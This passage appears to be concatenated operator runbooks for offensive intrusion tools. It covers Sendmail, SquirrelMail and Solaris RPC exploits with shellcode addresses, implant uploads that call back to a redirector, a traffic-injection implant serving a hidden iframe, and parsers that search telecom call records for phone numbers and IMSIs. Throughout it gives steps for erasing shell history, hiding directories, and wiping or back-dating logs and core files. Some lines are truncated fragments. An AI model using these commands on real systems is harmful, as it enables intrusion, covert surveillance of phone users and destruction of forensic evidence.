(EE) LoadModule: Module pcidata does not have a pcidataModuleData data ob
ject.
(EE) Failed to load module "pcidata" (invalid module, 0)
Fatal server error:
Unable to load required base modules, Exiting...
Please consult the The X.Org Foundation support

at http://wiki.X.Org
for help.
Please also check the log file at "Xorg.log" for additional information.
### you probably have root now, so do your unsets:

unset HISTFILE
unset HISTSIZE
unset HISTFILESIZE
id
### start a new noserver as root:
PATH=. crond
### Connect to nopen:

-nstun TARGET_IP
### CLEANUP:
# no logging
###
### END File user.tool.englandbogy.COMMON
### (see also ../etc/user.tool.englandbogy.COMMON)
###
### BEGIN File user.tool.earlyshovel.COMMON (see also ../etc/user.tool.earlysh
ovel.COMMON)
###
#########################################################
# EARLYSHOVEL
#########################################################
### publicly known vulnerability
### remote exploit available for linux RH7 running sendmail
###Supported targets:
### "ASPRH73": ASP Linux 7.3 or RedHat 7.3 running Sendmail 8.11.6
### "RH70": RedHat 7.0 running Sendmail 8.11.0
### requires valid user name ( 7.1 and 7.3)
### may also require valid domain for (7.3)
mx
:%s/TARGET_OS/TARGET_OS/g
:%s/USER_NAME/USER_NAME/g
:%s/DOMAIN/DOMAIN/g
:%s/RANDOM_PORT/RANDOM_PORT/g
`x
#banner mail
# alternate way to banner
##on pitch
-tunnel
l 2525 TARGET_IP 25
###local scripted
telnet 127.0.0.1 2525
## after getting banner
helo DOMAIN
mail from: user@DOMAIN # use random user name
### may be getting rejected as spam???
$ ./eash.py -?
usage:
/current/bin/earlyshovel/eash.py [options]
options
--atimeout seconds (default = 30)
Authentication timeout (in seconds)
--cip IPAddress (default = 127.0.0.1)
Callback IP address
--clport port
Local callback port
--cport port
Callback port
--ctimeout seconds (default = 30)
Callback timeout (in seconds)
--domain domainName
Domain name of sender
--exec filename
File to exec on successful upload
-? | --help
Print the usage message
--recipient emailAddress (default = root)
Email recipient
--target target
Target OS
--tip IPAddress (default = 127.0.0.1)
Target IP address
--tmpnam filename
Remote name of the uploaded file (of the form /tmp/fileXXXXXX)(def=filekdB
tDF)
--tport port (default = 25)
Target port
--upload filename
File to upload
Supported targets:
"ASPRH73": ASP Linux 7.3 or RedHat 7.3 running Sendmail 8.11.6
"RH70": RedHat 7.0 running Sendmail 8.11.0
### REDIRECTION
-tunnel
l 2525 TARGET_IP 25
r RANDOM_PORT
### LOCAL WINDOW: UPLOADS NOPEN AUTOMATCALLY- as of VERSION 2.4.0
cd /current/bin/earlyshovel
./eash.py --tip 127.0.0.1 --tport 2525 --cip REDIRECTOR_IP --cport RANDOM_PORT
--recipient USER_NAME --target TARGET_OS --domain DOMAIN --exec /current/bin/no
client --upload /current/up/morerats/noserver-3.0.3.1-i586.pc.linux.gnu.redhat-5
.0
-OR-
### LOCAL WINDOW:MANUAL UPLOAD of NOPEN
cd /current/bin/earlyshovel
--recipient USER_NAME --target TARGET_OS
--recipient USER_NAME --target TARGET_OS --domain DOMAIN
### you will get an interactive root shell
unset HISTFILE
unset HISTFILESIZE
unset HISTSIZE
id
pwd
w
# upload nopen as sendmail

mkdir /tmp/.scsi;cd /tmp/.scsi;pwd
# if uudecode/uncompress exists:
# LOCALLY
cd /current/up
cp /current/up/morerats/noserver-3.0.3.1-i586.pc.linux.gnu.redhat-5.0 sendmail
compress sendmail
uuencode sendmail.Z sendmail.Z > sendmail.Z.uu
gedit sendmail.Z.uu
# on TARGET in interactive window
uudecode; ls -la
copy/paste gedit contents into this window
umcompress sendmail.Z
ls -l
chmod 700 sendmail
PATH=. sendmail
# from redirector
-nstun TARGET_IP
###END of MANUAL UPLOAD
###CLEANUP
#if nopen is uploaded automatically:
-ls /tmp/filekdBtDF
-rm /tmp/filekdBtDF
# look where mail may be logged

grep mail /etc/syslog.conf
-tail /var/log/maillog
#remove mail messages from file
grep USER_NAME /var/log/maillog
# do this;if grep will clean everything needed
-gs grepout USER_NAME /var/log/maillog
# if our logs entries are the only entries in file
cat /dev/null > /var/log/maillog
#change timestamp of file
-touch /var/log/? /var/log/maillog
#delete mail msgs from users mail dir: path may be different
-lt /var/spool/mail/USER_NAME
-get /var/spool/mail/USER_NAME
#locally
cp /current/down/hostname.IP/var/spool/mail/USER_NAME /current/up/t
cd /current/up/t
#remove email from t
-put /current/up/t t
#target window
#if it looks good
cat t > /var/spool/mail/USER_NAME
# touch file to a "good" date
touch -t YYMMDDHHMM.ss /var/spool/mail/USER_NAME
#does user have a home dir
grep USER_NAME /etc/passwd
# look for users home dir and list it
-lt ?/?/USER_NAME
## look for .procmail or .forward files
cat files if there....
###
### END File user.tool.earlyshovel.COMMON
### (see also ../etc/user.tool.earlyshovel.COMMON)
###
### BEGIN File user.tool.curserazor.COMMON (see also ../etc/user.tool.curseraz
or.COMMON)
###
################ CURSERAZOR #########################
############### PARSING #######################################################
############
mx
:%s/HOST/HOST/g
'x
echo CRYPTKEY > /current/down/cryptkey.curserazor.DDMonYY
mz
#or
ls -altr

pty
### line and save)
### "file" results:
cat arg*
file arg*
dos2unix arg*
file arg*
ine
# if searching for LACs and cell id's, use the format in the documentation:
# ex. - 410 01 95 18374
# if searching for phone numbers, use the normal format:
# ex. - 4837506
### Make sure find the cryptTool...add to PATH if which fails...

### To encrypt one at a time...
EY -b
EY -b
file argfile*.enc
### Loop to encrypt all the argfiles
for i in argfile*.txt; do cryptTool.v1.0.Linux2.4.18-14.targetdl -i $i -o $i.enc
-k CRYPTKEY -b
file argfile*.enc

### These date ranges will be used as args in the curserazor commands.
########################## hazyrazor:
# paths based on isb-ser-imelive 172.20.16.136
ls -l /ImE/data05_loc/DATA_5.0/OUTPUT/MSC/ARCHIVE/*200710*GCDR$ | wc
ls -l /ImE/data05_loc/DATA_5.0/OUTPUT/MSC/ARCHIVE/ | grep 200710.*GCDR$ | head -
30
ls -l /ImE/data05_loc/DATA_5.0/OUTPUT/MSC/ARCHIVE/ | grep 200710.*GCDR$ | tail -
30
### Tips for running the CURSERAZOR 1.1
>>T: )!!!!
additional
### The phone list is deleted automatically
######## Upload the parser (CURSERAZOR) and call it nscd

# First, using a wildcard, confirm our hidden directory (and that we are privele
ged)
-ctrl -d
# or maybe something like this?
-ls /lib/.02dbb*
# Now (using the full path, this wildcard will fail), cd there and add it to our
path
-cd /lib/.02dbb*
-addpath .
# Put up the tool as nscd
-put /current/up/curserazor.v1.1.SunOS5.10.targetdl nscd
which nscd
-lt
-setenv B=-k CRYPTKEY -z "find /ImE/data05_loc/DATA_5.0/OUTPUT/MSC/ARCHIVE/ -nam
e '*2007103*GCDR' -print" -P ./awk
-ls -t
which nscd
##### Upload the encrypted phone list as awk, modify each parser command to hav
e the
.enc)
2, etc.)
TIME ALLOWS
############ argfile 1
nscd >T:/current/down/cdrhits.curserazor.HOST.DDMonYY.enc1
-beep 15
e '*2007102[89]*GCDR' -print" -P ./awk
./nscd >T:/current/down/cdrhits.curserazor.HOST.DDMonYY.enc1.more
-beep 15
############ argfile 2
-beep 15
e '*2007102[89]*GCDR' -print" -P ./awk
-beep 15
############ argfile 3
-beep 15
e '*2007102[89]*GCDR' -print" -P ./awk
-beep 15
######
###### survey mode:
######
e '*2007102[89]*GCDR' -print" -x
./nscd >T:/current/down/cdrhits.curserazor.HOST.DDMonYY.enc.surveyIMEI
e '*2007102[89]*GCDR' -print" -y
./nscd >T:/current/down/cdrhits.curserazor.HOST.DDMonYY.enc.surveyMSC
######
######
cd /current/down
ls -latr cdrhits*enc*
cryptTool.v1.0.Linux2.4.18-14.targetdl -i cdrhits.curserazor.HOST.DDMonYY.enc1 -
o cdrhits.curserazor.HOST.DDMonYY.txt1 -k CRYPTKEY -d -c
cryptTool.v1.0.Linux2.4.18-14.targetdl -i cdrhits.curserazor.HOST.DDMonYY.enc2 -
o cdrhits.curserazor.HOST.DDMonYY.txt2 -k CRYPTKEY -d -c

cd /current/down
ls -latr cdr*txt*
######
### ps -ef |grep nscd
### kill -9 <PID>
######
######
ls -l cdrhits*txt*
mz
cp cdrhits*txt* /mnt/zip*/PROJECTNAME
uz
#####
##### clean up
#####
-rm nscd awk
-lt
-cd /tmp
-lt
w
ps -ef | sort
-lt /
-burnBURN
###
### END File user.tool.curserazor.COMMON
### (see also ../etc/user.tool.curserazor.COMMON)
###
### BEGIN File user.tool.cursehappy.preversion4.COMMON (see also ../etc/user.t
ool.cursehappy.preversion4.COMMON)
###
################ CURSEHAPPY #########################
############### PARSING #######################################################
############
### Rec type - record type correlates with ProjectName, valid values: eh, ls, ss
, wb
mx
:%s/RECTYPE/RECTYPE/g
:%s/HOST/HOST/g
'x
echo CRYPTKEY > /current/down/cryptkey.cursehappy.DDMonYY
mz
#or
ls -altr

pty
### line and save)
### "file" results:
cat arg*
file arg*
dos2unix arg*
file arg*
ine
# s123456789 - IMSI
# e123456789 - IMEI
### These date ranges will be used as args in the cursehappy commands.
########################## wholeblue:
# tpmw01 10.3.4.55
# tpmw02 10.3.4.56
### verifies isb, khi, and lhr directories:
### shows oldest and newest files in directories:
# isbapro1 10.5.7.51
# nothing new
10
10
10
10
10
10
# newer stuff
# old stuff:
########################## editionhaze:
ls -latr /u06/saba/CDR/out/MS* | head -10
ls -latr /u06/saba/CDR/out/MS* | tail -10
ls -latr /u06/saba/CDR/out/MS* | wc -l
########################## liquidsteel:
########################## sicklestar:
### magnum: CURSEHAPPY not working on all SS .usd files :-(
### Try these first, should be all of them in one spot
### If none in previous ones...
########################## CURSEHAPPY #########################################
###############
################################################################################
###############
EY -b
EY -b
file argfile*.enc
ls -l
file argfile*.enc
### Tips for running the CURSEHAPPY 3.2
>>T: )!!!!
additional
### DO NOT use -loglevel if also using >L: or >T: (mixed output corrupts
the decryption)
### The phone list is NOT deleted automatically in v3.2
### remove it between each run as a practice
### Useful options:
-n name of text file containing phone numbers
-rt record type: eh, ls, ss, RECTYPE
-files list of files to parse (can contain wildcards) optional - same a
s no option
-d output optional fields
-all all record output (no search performed)
-loglevel [#] level of info emitted via stderr:0,1,2,3
######## Upload the parser (CURSEHAPPY) and called it crond

mkdir /tmp/.scsi
-cd /tmp/.scsi
-put /current/up/cursehappy crond
# or
-put /mnt/zip*/cursehappy crond
##### Upload the encrypted phone list as adm, modify each parser command to hav
e the
.enc)
2, etc.)
TIME ALLOWS
############ argfile 1
KEY=CRYPTKEY; export KEY; ./crond -rt RECTYPE -n ./adm -d /CHANGEME/CDRFILES.200
-beep 15
### Remove tasking once crond is running
-rm adm
6071[012]* >T:/current/down/cdrhits.cursehappy.HOST.DDMonYY.enc1.more
-beep 15
-rm adm
############ argfile 2
-beep 15
-rm adm
-beep 15
-rm adm
############ argfile 3
-beep 15
-rm adm
-beep 15
-rm adm
#############
############# for loglevel testing (local file should be ascii?)
#############
KEY=CRYPTKEY; export KEY; ./crond -rt RECTYPE -n ./adm -w e -loglevel 2 -d /CHAN
GEME/CDRFILES.2006071[0-2]* >T:/current/down/cdrhits.cursehappy.HOST.DDMonYY.tes
t
-beep 15
-rm adm
######
######
cd /current/down
ls -latr cdr*enc*

cd /current/down
ls -latr cdr*txt*
######
### kill -9 <PID>
######
######
ls -l cdr*txt*
mz
uz
#####
##### clean up
#####
-rm crond adm
-lt
-cd /tmp
-rm .scsi
-lt
w
ps -ef | sort
-lt /
-burnBURN
###
### END File user.tool.cursehappy.preversion4.COMMON
### (see also ../etc/user.tool.cursehappy.preversion4.COMMON)
###
### BEGIN File user.tool.elideskew.COMMON (see also ../etc/user.tool.elideskew
.COMMON)
###
#########################################################
# ELIDESKEW v1.0.0.1
#########################################################
### Public known vulnerablity in SquirrelMail versions 1.4.0 - 1.4.7
### Patched for versions => 1.4.8
### Tested on CentOS and FreeBSD successfully
### will be apache on target; use approprate tool( if available) to elevate
mx
:%s/RANDOM_PORT/RANDOM_PORT/g
`x
### scan port 80 to look for squirrel banner ( may report version; needs to
### be version 1.4.0 - 1.4.7 to work)
### need banner to help determine squirrel mail dir
### set up redirection

### on redirector
-tunnel
l 80 TARGET_IP
## get ELIDESKEW usage
## scripted local window
cd /current/bin
./elideskew.pl
-ch - Check forexploit
-l [file] - File to upload
-r [path] - Upload destination path/filename
-c [String] - Command Line to execute, if you want
to use the file just uploded, then INCLUDE IT.
-u [url] - http://host.com/squirrelMail/
get from http banner eg. /webapps/sq147
## test for exploit vulnerability
## local scripted window
./elideskew.pl -u http://127.0.0.1/webapps/sq147 -ch
### will report YES ( with OS) or NO
### sample good output
###Checking...
###Linux webapps.jetson.net 2.6.9-42.ELsmp #1 SMP Sat Aug 12 09:39:11 CDT 2006
i686 i686 i386 GNU/Linux
###YES!
### If vulnerable; proceed; run commands on target to find dir read/writeable by
apache
./elideskew.pl -u http://127.0.0.1/webapps/sq147 -c 'uname -a; w; pwd; ls -al
../data'
### note pwd result; /var/www/html/webapps/sq147/src (default dir) is not writea
ble/executable by apache but ../data is....
### Ready to upload and execute NOPEN
### on REDIRECTOR_IP
-nrtun RANDOM_PORT
### local scripted window [[ note: the backticks "`" may or may not be necessar
y ]]
./elideskew.pl -u http://127.0.0.1/webapps/sq147 -l /current/up/morerats/noserv
er-3.0.3.6-i686.pc.linux.gnuoldld.redhat-6.0 -r /var/www/html/webapps/sq147/data
/nos -c '`D=-cREDIRECTOR_IP:RANDOM_PORT /var/www/html/webapps/sq147/data/nos`'
### if all goes well you will be apache on target (note: some apache configurati
ons run
as nobody)
need to elevate; choose appropriate tool
### cleaning logs
Logging varies by platform:
on CentOS - /var/log/httpd/error_log ; CentOS runs SELinux so it also logs when
nopen
tries to call back in /var/log/messages. CentOS will not allow nopen to
bind
to a port as a server so must use callback mode for nopen
on FreeBSD - [APACHE_PREFIX]/logs/error_log
###
### END File user.tool.elideskew.COMMON
### (see also ../etc/user.tool.elideskew.COMMON)
###
### BEGIN File user.tool.poptop.COMMON (see also ../etc/user.tool.poptop.COMMO
N)
###
### EncTelnet/Poptop
### To use Nopen over an existing connection (i.e. telnet)
### Window 1: Nopen Window - Setup tunnel to dude telnetting to
-tunnel
l 2323 DUDE 23
### Window 2: Local scripted window - Use spawn to be your telnet client
### The window will look kinda funny with debug telnet negotiation stuff
### going by, and you'll see the typed password in the clear...get over it
spawn.v3 127.0.0.1 2323 telnet
<login as usual, unsets, blah blah...>
### Window 3: Local window: prep poptop/noserver
cp TARGNOSERVER /current/up/nscd
cp TARGPOPTOP /current/up/crond
compress nscd crond
uuencode nscd.Z nscd.Z > nscd.uu
uuencode crond.Z crond.Z > crond.uu
### Window 2: Accept files for upload
uudecode
--p /current/up/nscd.uu
uudecode
--p /current/up/crond.uu
uncompress nscd.Z crond.Z
### Window 2: Run Nopen and poptop
chmod 700 nscd crond
PATH=. D=-lPORT nscd
PATH=. crond
### 1st prompt for "arg" is port
PORT
### 2nd prompt for "arg" is file descriptor, use 0 for stdin
0
### Should now get a line saying "tty is setup"
### Window 4: Local scripted window: setup for Nopen connect
noclient -l 8080
### Window 2: type "---" and hit enter, should
### have a connection in your noclient window then
---
### Window 4: To get multiple windows on target, will need use this window
### as a -tunnel window, and tunnel to yourself over loopback
### And oh yeah, remove the binaries
-rm crond nscd
-tunnel
l PORT 127.0.0.1
### In other scripted windows
noclient 127.0.0.1:PORT
### Do whatever you need to do...
### When all done...
-burnBURN
### Window 2: this window will now probably go nuts, ^C will
### take you back to your op box shell prompt, and officially
### close your telnet connection (see connection close in your
### Window 1 -tunnel window).
### Note that there will be another log entry put into
### wtmp that cannot be toasted away, should not be seen by admins though...
EOF
###
### END File user.tool.poptop.COMMON
### (see also ../etc/user.tool.poptop.COMMON)
###
### BEGIN File user.tool.seconddate.COMMON (see also ../etc/user.tool.secondda
te.COMMON)
###
# SECONDDATE
:syntax on
#########
# SET UP
#########
# get tasking directories and put them on media
# check op plan for correct tasking date
/projects/web_proxy_tasking/to_lowside/YYYYMMDD/YYYYMMDD.HH.MM.SS-IP_ADDRESS
# copy and extract binaries to /current/bin
mz
cp /mnt/zip/seconddate_tools.tar /current/bin
cd /current/bin
tar xvf /seconddate_binaries.tar
# copy tasking directories to /current/bin/sd and extract
cp -r /mnt/zip/TASKING /current/bin/sd
cd /current/bin/sd
# copy the SECONDDATE command and control binary to each tasking directory
# the rules are set by relative path;
# the command and control binary needs to be in the same path as the inject and
regex files
# tasking directory name format: YYYYMMDD.HH.MM.SS-IP_ADDRESS
# inject tag name format: YYYYMMDDHHMMSS-IP_ADDRESS-inject-<number>.bin
# regex file name format: YYYYMMDDHHMMSS-IP_ADDRESS-regex-<number>.bin
cp /current/bin/sd/1.1.1.1/Binaries/Seconddate_CnC /current/bin/sd/YYYYMMDD.HH.M
M.SS-IP_ADDRESS
#################
# PREP COMMANDS
#################
# all commands to run at local Seconddate_CnC prompt are in commands.txt
# you should have already copied it here:
# /current/bin/sd/YYYYMMDD.HH.MM.SS-IP_ADDRESS/commands.txt
cd /current/bin/sd/YYYYMMDD.HH.MM.SS-IP_ADDRESS
egrep "disable" commands.txt > disable.txt
egrep "rule" commands.txt | egrep -v "showrule --all" > rules.txt
egrep "enable" commands.txt > enable.txt
# open command files in gedit text editor; xemacs works too; vi doesn't work
gedit disable.txt &
# open the other files rules.txt and enable.txt
####################
# CONNECT TO IMPLANT
###################
# local_port - listen on this port locally; i.e. the ops box; pick a random p
ort
# target_ip - ip of target that is running SECONDDATE to which you want to c
onnect
# target_port - port to which you'll connect to target; can be the same as loc
al_port
mx
:%s/LOCAL_UDP_PORT/LOCAL_UDP_PORT/g
:%s/TARGET_UDP_PORT/TARGET_UDP_PORT/g
`x
# set up UDP tunnel from redirector; won't work locally on target box
# u <random_local_port> <target_ip> <random_target_port>
-tunnel
u LOCAL_UDP_PORT TARGET_IP TARGET_UDP_PORT
# in locally scripted window
# run CnC
# ./Seconddate_CnC 127.0.0.1 <udp tunnel port>
./Seconddate_CnC 127.0.0.1 LOCAL_UDP_PORT
# run command
ping
# should recieve an 'OK'
# if you can't get an OK, the target may have rebooted; tool only runs in memory
# connect to the target via -irtun and check to see if SECONDDATE is running
# if it's not running you need to deploy
ps -ef | grep IMPLANT_FILENAME
cd /dev; ps -ef | grep IMPLANT_FILENAME
##############
# RUN COMMANDS
#############
# help menu
?
#or
help
# do these first
ping
# synopsis of rules and injects
getinfo
# check rule log
getlog
# show all rules
showrule --all
# have gedit window with rules commands available
# if you still have gedit open with the commands files, go to the disable comman
ds section below
# if you closed it after setup, reopen the commands files with gedit
# command files you previously set up are here including the commands.txt file:
# /current/bin/sd/YYYYMMDD.HH.MM.SS-IP_ADDRESS
# open command files in gedit text editor; xemacs works too; vi doesn't work
gedit disable.txt &
# open the other files rules.txt and enable.txt from within gedit
# run disable commands only for enabled rules you know are going to change
# otherwise, disable all of the rules
# disable commands are in the file disable.txt
# clear log only if instructed to do so
# will fail if any rules are enabled
clearlog
# set rules; make sure the rules in rules.txt match what is on target
# rule commands are in the file rules.txt
# enable rules; watch for "Enabled: yes" in each rule displayed
# enable commands are in the file enable.txt
# show all rules
showrule --all
# check for empty rule enabled:
getinfo
# if the matches/hits/injects are increasing rapidly, then you probably enabled
an empty rule
# find the emtpy rule that's enabled
getlog
# look for the rule that has the most hits
# disable it and display it with showrule
# done
exit
# copy script files
# when finished with locally scripted window, type exit, or type CTL-D only once
# this reveals the name of the script file
cp script.<some_number> script.<target_ip>.seconddate.log
# you can remove the original script if you like
#########
# DEPLOY
#########
# if the target box rebooted, you'll have to deploy the tool
# connect via -irtun
# hidden_dir - hidden directoy on the target
# INCISION targets will have a manually created hidden d
irectory
# STOICSURGEON targets can run SECONDDATE from the STOIC
SURGEON directory
# sd_binary _path - where the SECONDATE binaries are lcoated on the ops bo
x:
# /current/bin/sd/1.1.1.1/Binaries
# implant_filename - what you want to call the SECONDDATE binary on target
mx
:%s:HIDDEN_DIR:HIDDEN_DIR:g
:%s/SD_BINARY_PATH/SD_BINARY_PATH/g
:%s/IMPLANT_FILENAME/IMPLANT_FILENAME/g
`x
# INCISION targets; skip if STOICSURGEON
# create hidden directory on linux target if you don't have one already
# mkdir -p /tmp/.<name_of_dir_to_hide>; __HMODE__=enable touch /tmp/.<name_ofdir
_to_hide>
# try to use a drectory name that blends in on teh target
# example:
# mkdir -p /tmp/.orbit561; __HMODE__=enable touch /tmp/.orbit561
mkdir -p HIDDEN_DIR; __HMODE__=enable touch HIDDEN_DIR
# make sure the directory was created
-ls HIDDEN_DIR
# make sure the directory is hidden
# you should not see the hidden directory
cd /dev; ls -al HIDDEN_DIR
# cd to hidden directory
# STOICSURGEON targets can run SECONDDATE from the STOICSURGEON directory
# INCISION targets run from hidden directory
# -cd /tmp/.orbit561
-cd HIDDEN_DIR
# put up tool
# -put <tool_location_opsbox> <tool_name_on_target>
# example
# -put /current/bin/sd/1.1.1.1/Binaries/Seconddate_Implant crond
-put SD_BINARY_PATH IMPLANT_FILENAME
##################
# START SECONDDATE
##################
# look for setsid
which setsid
# or
locate setsid
# run:
setsid /bin/bash -c 'PATH="." crond' > /dev/null 2>&1 &
# or, if there's no setsid
# -shell
# PATH=. crond
-shell
PATH=. IMPLANT_FILENAME
# Ctrl-D to get out of shell and get your NOPEN prompt
# be careful
# if there's no setsid, get noserver pid (parent of nopen pid)
# you'll have to kill the root noserver later when getting off target
# i.e. the parent pid of the nopen window you're in
-pid
# INCISION targets make sure it's hidden
# annotate pid of running implant in your opnotes
# cd /dev; ps -ef | grep crond
cd /dev; ps -ef | grep IMPLANT_FILENAME
# remove implant
# -rm crond
-rm IMPLANT_FILENAME
# in locally scripted window
# run CnC
./Seconddate_CnC 127.0.0.1 LOCAL_UDP_PORT
# help menu
help
# ping
ping
###############
# LEAVE RUNNING
###############
# may want to leave implant running and come back later
# if implant is left running exit from the CnC tool
exit
# check lastlog for reboot frequecy
last -100 | egrep "hutdow|eboo"
# INCISION targets make sure the running implant is hidden
# cd /dev; ps -ef grep <implant_filename>
cd /dev; ps -ef grep IMPLANT_FILENAME
###########
# UNINSTALL
###########
# to stop running implant in preparation for leaving target box
# in local CnC window that's scripted, uninstall the implant
uninstall
# in NOPEN window
# check process list; make it's not hung; if hung, kill it
kill -9 <implant_pid>
##########
# FINISHED
##########
# getting ready to get off the target
# to burn or not to burn?
# read all lof the following before getting off target
# if you're not leaving the implant running after getting off the target:
# - make sure you uninstall the implant as stated above
# - ensure it not hung; if so, kill it
# - then burn
#
# if you're on target under a noserver that did not spawn the implant
# process you may burn, i.e. the implant process is not the child
# of the noserver process
#
# if you ran the implant using 'setsid', you may also burn:
-burn
# if you ran the implant under your present noserver and wish to leave it
# running, you need to make sure the implant continues when done with target
# if there was no 'setsid' on the target box when you ran the implant:
# - kill the noserver that is listening under which you started the implant
# if you burn in this case the implant process will be killed
kill -9 <noserver_pid>
# - use "-exit" to get out of all nopen windows
-exit
# check your connection to the implant from the redirector next to the
# target running the implant
# run a few commands
ping
getinfo
# if connection is OK then you're done
ping
# should recieve an 'OK'
# if you can't connect to the implant
# get back up on target and check to see if implant is still running
# if the implant is not running you may have missed something when running
# the implant or disconnecting
# put it back up and run it again
# if you can't connect and the implant is running try troubleshooting
# the ports you're using
# copy script files
# when finished with locally scripted window, CTL-D only once
# this reveals the name of the script file
cp script.<some_number> script.<target_ip>.seconddate.log
# you can remove the original script if you like
#///////////////////////////////
# TASKING BY HAND - THE OLD WAY
#//////////////////////////////
#############
# INJECT FILE
#############
# configure inject file
# you will need to have a file containing the data for the inject packet
# first the http info:
# then the tag followed by 2 carriage retruns
# example
<inject_file_begin>
HTTP/1.1 200 OK
Pragma: no-cache
Content-Type: text/html
Cache-Control: no-cache,no-store
<html><meta http-equiv="refresh" content="0"><body><iframe src="<REPLACE_WITH_UR
L_TO_USE>"height="1" width="1" scrolling="no" frameborder="0" unselectable="yes"
marginheight="0" marginwidth="0"></iframe></body></html>
<inject_file_end>
#####################
# REGULAR EXPRESSIONS
#####################
# regular expression file
# needed to pass to implant as argument when using regex in a rule
# can't have any carriage returns or newlines in the file
# it must only contain the characters relative to the regex
# use vi or echo:
vi -b -c "set noeol" <filename>
# or
echo -n <regex> > <filename>
#######
# RULES
#######
# set rule
# rule 1 --srcaddr <target_network_address> --srcmask 255.255.255.0 --dstport 80
--maxinjections 10 --injectwindow 600 --nocheckregex --injectfile pkt
# examples:
rule 1 --dstport 80 --maxinjections 2 --injectwindow 600 --regexfile <regex_file
_1> --injectfile pkt
rule 2 --dstport 80 --maxinjections 2 --injectwindow 600 --regexfile <regex_file
_2> --injectfile pkt
# showrule
showrule 1
# to show all rules you'll have to wait a bit
# the tool will iterate through all 64 whether emtpy or not
# enable rule(s)
# you have to enable them individually
enable rule 1
# check for hits
getinfo
# check log
getlog
# when done disable rules
disable 1
# get last dump of log
getlog
# clear log
clearlog
###
### END File user.tool.seconddate.COMMON
### (see also ../etc/user.tool.seconddate.COMMON)
###
### BEGIN File user.tool.ebbisland.COMMON (see also ../etc/user.tool.ebbisland
.COMMON)
###
EBBISLAND
(Exploit for Solaris 2.6, 2.7, 2.8, 2.9 and 2.10)
First ensure that the vulnerable rpc service(bootparam) is running. You must
be able to reach the target system's TCP port that the designated target RPC
is listening upon.
Example
$ rpcinfo -p <target system>
program vers proto port service
100000 4 tcp 111 rpcbind
100000 4 udp 111 rpcbind
100232 10 udp 32772 sadmind
100083 1 tcp 32771
100221 1 tcp 32772
100068 2 udp 32773
100068 3 udp 32773
100068 4 udp 32773
100249 1 tcp 32782
100026 1 udp 32800 bootparam
100026 1 tcp 32790 bootparam
********************************************************************************
**************
EBBISLAND USAGE.
ebbisland: (-A <address>) Shellcode address
ebbisland: (-C) /core file overwriter/scrambler. This option throws the attack,
but uses pseudo-random binary data in place of the actual shellcode, to produce
a /core file free of suspicious content. This would be used in the case where EB
BISLAND failed to successfully exploit the target, and the operator wanted to tr
y and "purify" the file left in /core before quitting.
ebbisland: (-c <procnum>) Procedure number. Defaults to 0.
ebbisland: (-D) For and extra dummy connection
ebbisland: (-N) Use for non-inetd started services (i.e. rpc.bootparamd)
ebbisland: (-M <mtu>) Choose size of data part of packet to send. Default is 12
60. This could effect the landing zone size.
ebbisland: (-P <prog>) Optional prog to exec, re-using exploit socket.
ebbisland: (-r <prognum>) RPC program number
ebbisland: (-s <source port>)
ebbisland: (-V) Provides verbose outputs, where appropriate and desired.
ebbisland: (-X | -F) -X For indirect/xdr_replymsg programs, and -F for others
********************************************************************************
***********
Table of Exploit addresses for rpc.bootparamd (SPARC)
100026 rpc.bootparamd 2.6 -X -N 0x641a0
100026 rpc.bootparamd 2.7 -X -N (earlier) 0x65798
100026 rpc.bootparamd 2.7 -X -N (earlier) 0x6d8d8
100026 rpc.bootparamd 2.8 -X -N 0x7c760
100026 rpc.bootparamd 2.9 -X -N 0x6e908
100026 rpc.bootparamd 2.10 -X -N 0x68318
********************************************************************************
*************
Redirector:
-tunnel
l <RHP> <TARGET IP> <BOOTPARAM_TCP_PORT>
Example:
l 32794 10.40.1.2 32790
Exploit:
./ebbisland -t <REDIRECTOR_IP> -p <REDIRECTOR_PORT> -r <TARGET_RPC.BOOTPARAMD_PR
OGRAMNUMBER> -X -N -A <SPECIFIC_SHELLCODE_ADDRESS>
Example against Solaris 2.9:
./ebbisland -t 127.0.0.1 -p 32794 -r 100026 -X -N -A 0x6e908
********************************************************************************
**
Exploit will provide ROOT shell access.
unset HISTSIZE
unset HISTFILESIZE
unset HISTFILE
w
pwd
id
cd /tmp
mkdir .scsi
cd .scsi
# locally
packrat RAND_PORT
<ctrl><c> # packrat command
gedit /current/up/sendmail.Z.uu
# Target
/usr/bin/uudecode; ls -latr
select all/copy gedit contents into Target exploit window
ls -l
chmod 700 sendmail
PATH=. sendmail
# from redirector
-nstun TARGET_IP (EnJOY)
*******************************************************************************
CLEANING.
* The correct EBBISLAND attack for the remote target architecture must be u
sed, or else the attack will fail, and the chosen TCP RPC daemon
will likely (1) abort and /core dump, and (2) log heavily. If this should occur,
a /core file will be left on the remote system. This /core file
will contain our attack data buffers, including "shellcode". The technique could
then be reverse engineered and developed into an attack. That's
why we have the '-C' option...please rerun the attack, and generate 1 more /core
file, containing our semi-innocuous pseudo-random shellcode data.
# Logging considerations: Quite a few log messages will be generated on the targ
et as each subsequent attack attempt fails, most likely written to the /var/adm/
messages file. These could include messages similar to...
Sep 27 14:37:23 target inetd[146]: [ID 858011 daemon.warning] /platform/SUNW,Ult
ra-Enterprise-10000/lib/dr_daemon: Illegal Instruction
Sep 27 14:37:24 target dr_daemon[23501]: [ID 629332 daemon.notice] dr_daemon att
empting AP interaction
Sep 27 14:37:24 target dr_daemon[23501]: [ID 264428 daemon.error] ld.so.1: dr_da
emon: fatal: libap.so: open failed: No such file or directory
Sep 27 14:37:24 target dr_daemon[23501]: [ID 355200 daemon.error] dr_daemon oper
ating in NO AP interaction mode
Sep 27 14:37:24 target dr_daemon[23501]: [ID 309875 daemon.notice] NOTICE: recov
ered old state file '/tmp/.dr_extra_info'
Sep 27 14:43:10 target inetd[146]: [ID 858011 daemon.warning] /usr/openwin/bin/k
cms_server: Illegal Instruction - core dumped
cms_server: Segmentation Fault - core dumped
Sep 27 14:43:13 target last message repeated 1 time
cms_server: Illegal Instruction - core dumped
cms_server: Segmentation Fault - core dumped
Sep 27 14:43:17 target last message repeated 2 times
Sep 27 14:43:55 target inetd[146]: [ID 858011 daemon.warning] /usr/sbin/rpc.meta
d: Illegal Instruction - core dumped
d: Bus Error - core dumped
d: Segmentation Fault - core dumped
###
### END File user.tool.ebbisland.COMMON
### (see also ../etc/user.tool.ebbisland.COMMON)
###
### BEGIN File user.tool.enemyrun.COMMON (see also ../etc/user.tool.enemyrun.C
OMMON)
###
##################
#### ENEMYRUN ####
##################
## copy and paste this into the window if you want syntax highlighting:
## it makes scripts a bit easier to read
:syntax on
##############
## ER SETUP ##
##############
##
## only get an encryption key value, if you don't already have one, ask first
##
#md5sum /current/down/tcpdump.raw
##
